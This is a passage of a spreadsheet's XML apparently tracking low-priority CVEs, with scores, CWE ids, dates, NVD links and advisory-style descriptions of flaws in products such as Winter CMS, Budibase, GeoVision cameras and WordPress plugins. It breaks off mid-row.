    <row r="5440">
      <c r="A5440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63179</t>
        </is>
      </c>
      <c r="C5440" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5440" s="5" t="inlineStr"/>
      <c r="F5440" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5440" s="5" t="inlineStr"/>
      <c r="H5440" s="5" t="inlineStr"/>
      <c r="I5440" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5440" s="5" t="inlineStr"/>
      <c r="K5440" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5440" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, authenticated backend users can disclose arbitrary files readable by the PHP process by injecting @import (inline) directives into LESS source that the backend compiles, because the LESS parser was instantiated without a safe import resolver and fell back to the raw attacker-supplied path when no allowed root matched. The flaw is reachable through four entry points that share the same root cause: the Brand Settings custom_css field, the Editor Settings html_custom_styles field, the Mail Brand Settings colour-picker fields whose values are concatenated into LESS source without escaping, and theme .less, .sass, and .scss assets compiled when served. Both absolute paths and .. traversal outside the asset's own tree were accepted, so an attacker could read any file the web process can access, most significantly the application .env file and the APP_KEY and database credentials it contains. Exploitation requires a backend account holding one of the associated permissions, which are assigned by default to the built-in Developer role. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M5440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63179</t>
        </is>
      </c>
    </row>
    <row r="5441">
      <c r="A5441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68785</t>
        </is>
      </c>
      <c r="C5441" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5441" s="5" t="inlineStr"/>
      <c r="F5441" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G5441" s="5" t="inlineStr"/>
      <c r="H5441" s="5" t="inlineStr"/>
      <c r="I5441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5441" s="5" t="inlineStr"/>
      <c r="K5441" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L5441" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M5441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t>
        </is>
      </c>
    </row>
    <row r="5442">
      <c r="A5442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73304</t>
        </is>
      </c>
      <c r="C5442" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5442" s="5" t="inlineStr"/>
      <c r="F5442" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5442" s="5" t="inlineStr"/>
      <c r="H5442" s="5" t="inlineStr"/>
      <c r="I5442" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5442" s="5" t="inlineStr"/>
      <c r="K5442" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5442" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.25, GET /api/users/metadata and GET /api/users/metadata/:id returned user objects processed by packages/server/src/utilities/global.ts without removing oauth2.accessToken or oauth2.refreshToken. A user with the POWER role could retrieve the identity-provider credentials of SSO-authenticated users and use the refresh tokens for persistent access to connected services. This issue is fixed in version 3.39.25.</t>
        </is>
      </c>
      <c r="M5442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73304</t>
        </is>
      </c>
    </row>
    <row r="5443">
      <c r="A5443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73307</t>
        </is>
      </c>
      <c r="C5443" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5443" s="5" t="inlineStr"/>
      <c r="F5443" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5443" s="5" t="inlineStr"/>
      <c r="H5443" s="5" t="inlineStr"/>
      <c r="I5443" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5443" s="5" t="inlineStr"/>
      <c r="K5443" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5443" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.4, uploadUrl in packages/server/src/utilities/fileUtils.ts used a bare server-side fetch for string attachment values passed by processAttachments in packages/server/src/sdk/workspace/ai/helpers/rows.ts. A builder with the AI table-generation feature could cause an attachment value to reference an internal service or cloud metadata endpoint, and the response would be stored as an attachment without fetchWithBlacklist validation. This issue is fixed in version 3.39.4.</t>
        </is>
      </c>
      <c r="M5443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73307</t>
        </is>
      </c>
    </row>
    <row r="5444">
      <c r="A5444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78624</t>
        </is>
      </c>
      <c r="C5444" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5444" s="5" t="inlineStr"/>
      <c r="F5444" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5444" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H5444" s="5" t="inlineStr"/>
      <c r="I5444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5444" s="5" t="inlineStr"/>
      <c r="K5444" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5444" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="M5444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t>
        </is>
      </c>
    </row>
    <row r="5445">
      <c r="A5445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84901</t>
        </is>
      </c>
      <c r="C5445" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5445" s="5" t="inlineStr"/>
      <c r="F5445" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5445" s="5" t="inlineStr"/>
      <c r="H5445" s="5" t="inlineStr"/>
      <c r="I5445" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5445" s="5" t="inlineStr"/>
      <c r="K5445" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5445" s="5" t="inlineStr">
        <is>
          <t>The Eventin  WordPress plugin before 4.1.22 does not properly check authorization on several of its event-management REST routes, allowing users with contributor-level access and above to change the site's front-page setting to an event they do not own and to create, edit and delete global event and speaker taxonomy terms they should not be able to manage.</t>
        </is>
      </c>
      <c r="M5445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84901</t>
        </is>
      </c>
    </row>
    <row r="5446">
      <c r="A5446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88279</t>
        </is>
      </c>
      <c r="C5446" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5446" s="5" t="inlineStr"/>
      <c r="F5446" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5446" s="5" t="inlineStr"/>
      <c r="H5446" s="5" t="inlineStr"/>
      <c r="I5446" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5446" s="5" t="inlineStr"/>
      <c r="K5446" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5446" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 copies oversized ONVIF CreateUsers username or password values into fixed stack fields, allowing an authenticated administrator to crash the ONVIF worker.</t>
        </is>
      </c>
      <c r="M5446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88279</t>
        </is>
      </c>
    </row>
    <row r="5447">
      <c r="A5447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88280</t>
        </is>
      </c>
      <c r="C5447" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5447" s="5" t="inlineStr"/>
      <c r="F5447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5447" s="5" t="inlineStr"/>
      <c r="H5447" s="5" t="inlineStr"/>
      <c r="I5447" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5447" s="5" t="inlineStr"/>
      <c r="K5447" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5447" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 copies an oversized ONVIF SetUser password into a fixed stack field, allowing an authenticated administrator to crash the ONVIF worker.</t>
        </is>
      </c>
      <c r="M5447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88280</t>
        </is>
      </c>
    </row>
    <row r="5448">
      <c r="A5448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88281</t>
        </is>
      </c>
      <c r="C5448" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5448" s="5" t="inlineStr"/>
      <c r="F5448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5448" s="5" t="inlineStr"/>
      <c r="H5448" s="5" t="inlineStr"/>
      <c r="I5448" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5448" s="5" t="inlineStr"/>
      <c r="K5448" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5448" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to limit repeated Username elements in ONVIF DeleteUsers requests, allowing an authenticated administrator to overflow a stack array and crash the ONVIF worker.</t>
        </is>
      </c>
      <c r="M5448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88281</t>
        </is>
      </c>
    </row>
    <row r="5449">
      <c r="A5449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88283</t>
        </is>
      </c>
      <c r="C5449" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5449" s="5" t="inlineStr"/>
      <c r="F5449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5449" s="5" t="inlineStr"/>
      <c r="H5449" s="5" t="inlineStr"/>
      <c r="I5449" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5449" s="5" t="inlineStr"/>
      <c r="K5449" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5449" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to limit repeated User elements in ONVIF CreateUsers requests, allowing an authenticated administrator to overwrite stack control state and crash the ONVIF worker.</t>
        </is>
      </c>
      <c r="M5449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88283</t>
        </is>
      </c>
    </row>
    <row r="5450">
      <c r="A5450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88284</t>
        </is>
      </c>
      <c r="C5450" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5450" s="5" t="inlineStr"/>
      <c r="F5450" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5450" s="5" t="inlineStr"/>
      <c r="H5450" s="5" t="inlineStr"/>
      <c r="I5450" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5450" s="5" t="inlineStr"/>
      <c r="K5450" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5450" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to limit repeated User elements in ONVIF SetUser requests, allowing an authenticated administrator to overwrite stack control state and crash the ONVIF worker.</t>
        </is>
      </c>
      <c r="M5450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88284</t>
        </is>
      </c>
    </row>
    <row r="5451">
      <c r="A5451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5451" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-48006</t>
        </is>
      </c>
      <c r="C5451" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5451" s="5" t="inlineStr"/>
      <c r="F5451" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5451" s="5" t="inlineStr"/>
      <c r="H5451" s="5" t="inlineStr"/>
      <c r="I5451" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5451" s="5" t="inlineStr"/>
      <c r="K5451" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L5451" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.3 does not perform case-insensitive matching when removing operator entries from ops.txt. The removeOp function lowercases the supplied name but only removes an exactly matching entry, so an operator name stored with non-lowercase letters cannot be revoked using the deop command, leaving the player as an operator until the entry is removed from ops.txt manually.</t>
        </is>
      </c>
      <c r="M5451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-48006</t>
        </is>
      </c>
    </row>
    <row r="5452">
      <c r="A5452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5452" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15614</t>
        </is>
      </c>
      <c r="C5452" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5452" s="5" t="inlineStr"/>
      <c r="F5452" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5452" s="5" t="inlineStr"/>
      <c r="H5452" s="5" t="inlineStr"/>
      <c r="I5452" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5452" s="5" t="inlineStr"/>
      <c r="K5452" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5452" s="5" t="inlineStr">
        <is>
          <t>ugrep before 7.6.0 contains a heap buffer over-read vulnerability in the LZW decompressor when processing crafted .Z archive files. Attackers can supply malformed .Z files that cause the decompressor to read one byte past the allocated heap buffer, potentially crashing the process.</t>
        </is>
      </c>
      <c r="M5452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15614</t>
        </is>
      </c>
    </row>
    <row r="5453">
      <c r="A5453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5453" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-3271</t>
        </is>
      </c>
      <c r="C5453" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5453" s="5" t="inlineStr"/>
      <c r="F5453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5453" s="5" t="inlineStr"/>
      <c r="H5453" s="5" t="inlineStr"/>
      <c r="I5453" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5453" s="5" t="inlineStr"/>
      <c r="K5453" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5453" s="5" t="inlineStr">
        <is>
          <t>Documentum Webtop versions prior to 16.7.1 software is vulnerable to an XSS</t>
        </is>
      </c>
      <c r="M5453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-3271</t>
        </is>
      </c>
    </row>
    <row r="5454">
      <c r="A5454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0304</t>
        </is>
      </c>
      <c r="C5454" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5454" s="5" t="inlineStr"/>
      <c r="F5454" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5454" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H5454" s="5" t="inlineStr"/>
      <c r="I5454" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5454" s="5" t="inlineStr"/>
      <c r="K5454" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L5454" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Palo Alto Networks Cortex XDR Broker VM enables an authenticated low privileged user with man-in-the-middle (MitM) access to execute code with root privileges on the Broker VM.</t>
        </is>
      </c>
      <c r="M5454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0304</t>
        </is>
      </c>
    </row>
    <row r="5455">
      <c r="A5455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18986</t>
        </is>
      </c>
      <c r="C5455" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5455" s="5" t="inlineStr"/>
      <c r="F5455" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5455" s="5" t="inlineStr"/>
      <c r="H5455" s="5" t="inlineStr">
        <is>
          <t>entity_browser_project:entity_browser</t>
        </is>
      </c>
      <c r="I5455" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5455" s="5" t="inlineStr"/>
      <c r="K5455" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5455" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Entity Browser allows Stored XSS. This issue affects Entity Browser versions: from 0.0.0 to 2.16.0.</t>
        </is>
      </c>
      <c r="M5455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18986</t>
        </is>
      </c>
    </row>
    <row r="5456">
      <c r="A5456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19862</t>
        </is>
      </c>
      <c r="C5456" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5456" s="5" t="inlineStr"/>
      <c r="F5456" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5456" s="5" t="inlineStr"/>
      <c r="H5456" s="5" t="inlineStr"/>
      <c r="I5456" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5456" s="5" t="inlineStr"/>
      <c r="K5456" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L5456" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder WordPress plugin before 3.6.5.2 does not validate or strip line breaks from address values it sources from submitted form fields before adding them to the headers of the e-mails it sends, allowing unauthenticated users to inject arbitrary e-mail headers, add hidden recipients and spoof the sender. Exploitation requires the site to be configured to take one of the message's addresses from a form field.</t>
        </is>
      </c>
      <c r="M5456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19862</t>
        </is>
      </c>
    </row>
    <row r="5457">
      <c r="A5457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21086</t>
        </is>
      </c>
      <c r="C5457" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5457" s="5" t="inlineStr"/>
      <c r="F5457" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5457" s="5" t="inlineStr"/>
      <c r="H5457" s="5" t="inlineStr"/>
      <c r="I5457" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5457" s="5" t="inlineStr"/>
      <c r="K5457" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5457" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in ProxyHandler prior to SMR Aug-2026 Release 1 allows local attackers to access proxy configuration.</t>
        </is>
      </c>
      <c r="M5457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21086</t>
        </is>
      </c>
    </row>
    <row r="5458">
      <c r="A5458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21090</t>
        </is>
      </c>
      <c r="C5458" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5458" s="5" t="inlineStr"/>
      <c r="F5458" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5458" s="5" t="inlineStr"/>
      <c r="H5458" s="5" t="inlineStr"/>
      <c r="I5458" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5458" s="5" t="inlineStr"/>
      <c r="K5458" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L5458" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsaviextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M5458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21090</t>
        </is>
      </c>
    </row>
    <row r="5459">
      <c r="A5459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21091</t>
        </is>
      </c>
      <c r="C5459" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5459" s="5" t="inlineStr"/>
      <c r="F5459" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5459" s="5" t="inlineStr"/>
      <c r="H5459" s="5" t="inlineStr"/>
      <c r="I5459" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5459" s="5" t="inlineStr"/>
      <c r="K5459" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L5459" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libcodec2secevrcdec.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M5459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21091</t>
        </is>
      </c>
    </row>
    <row r="5460">
      <c r="A5460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21113</t>
        </is>
      </c>
      <c r="C5460" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5460" s="5" t="inlineStr"/>
      <c r="F5460" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5460" s="5" t="inlineStr"/>
      <c r="H5460" s="5" t="inlineStr"/>
      <c r="I5460" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5460" s="5" t="inlineStr"/>
      <c r="K5460" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L5460" s="5" t="inlineStr">
        <is>
          <t>Improper export of android application components in Visual Voicemail prior to version 20.1.00.05 allows local attackers to initiate call without proper permission.</t>
        </is>
      </c>
      <c r="M5460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21113</t>
        </is>
      </c>
    </row>
    <row r="5461">
      <c r="A5461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40175</t>
        </is>
      </c>
      <c r="C5461" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5461" s="5" t="inlineStr"/>
      <c r="F5461" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G5461" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5461" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I5461" s="5" t="inlineStr">
        <is>
          <t>2026-04-10</t>
        </is>
      </c>
      <c r="J5461" s="5" t="inlineStr"/>
      <c r="K5461" s="5" t="inlineStr">
        <is>
          <t>CWE-113, CWE-444, CWE-915, CWE-918</t>
        </is>
      </c>
      <c r="L5461" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Versions prior to 1.15.0 and 0.3.1 are vulnerable to a specific gadget-style attack chain in which prototype pollution in a third-party dependency may be leveraged to inject unsanitized header values into outbound requests. This vulnerability is fixed in 1.15.0 and 0.3.1.</t>
        </is>
      </c>
      <c r="M5461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40175</t>
        </is>
      </c>
    </row>
    <row r="5462">
      <c r="A5462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45572</t>
        </is>
      </c>
      <c r="C5462" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5462" s="5" t="inlineStr"/>
      <c r="F5462" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5462" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5462" s="5" t="inlineStr"/>
      <c r="I5462" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5462" s="5" t="inlineStr"/>
